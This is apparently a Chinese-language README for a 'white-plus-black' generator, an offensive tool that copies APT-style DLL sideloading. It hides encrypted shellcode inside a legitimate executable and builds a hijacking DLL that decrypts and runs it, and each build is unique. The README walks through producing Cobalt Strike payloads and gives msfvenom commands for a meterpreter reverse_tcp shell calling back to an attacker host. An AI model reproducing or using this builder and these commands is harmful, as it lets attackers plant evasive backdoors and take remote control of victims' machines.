白加黑自动化生成器

模仿APT组织白加黑的攻击方式,如海莲花样本追踪与分析(二)海莲花APT分析-白加黑 本工具可以根据白加黑样本模板自动生成白加黑的工具,dll由go在线编译

shellcode会被写入到白可执行文件中,dll会从白文件中读取shellcode解密并执行。

输入shellcode,选择好白加黑的模板(注意对应架构),32位选择x86,64位选择x64。每次生成都会生成一个独一无二的文件。

生成的文件会包含:

  • 成品的白加黑文件
  • 用于dll劫持的go源码文件,方便自行进行一些处理
  • readme说明文件,说明了每个文件的作用以及编译方法

cobaltstrike 生成shellcode

生成后门 - Payload Generator

image-20200915165153533

生成C语言格式

保存文件后复制生成的payload.c中所有的内容

点击生成即可。

msfvenom 生成shellcode

生成64位的payload c语言文件

msfvenom -p windows/x64/meterpreter/reverse_tcp -f c -o payload.c LHOST=x.x.x.x LPORT=7900

或者直接生成hex格式(推荐)

msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o payload.c LHOST=x.x.x.x LPORT=7900

image-20200915170759934

复制payload.c文件到shellcode文本框即可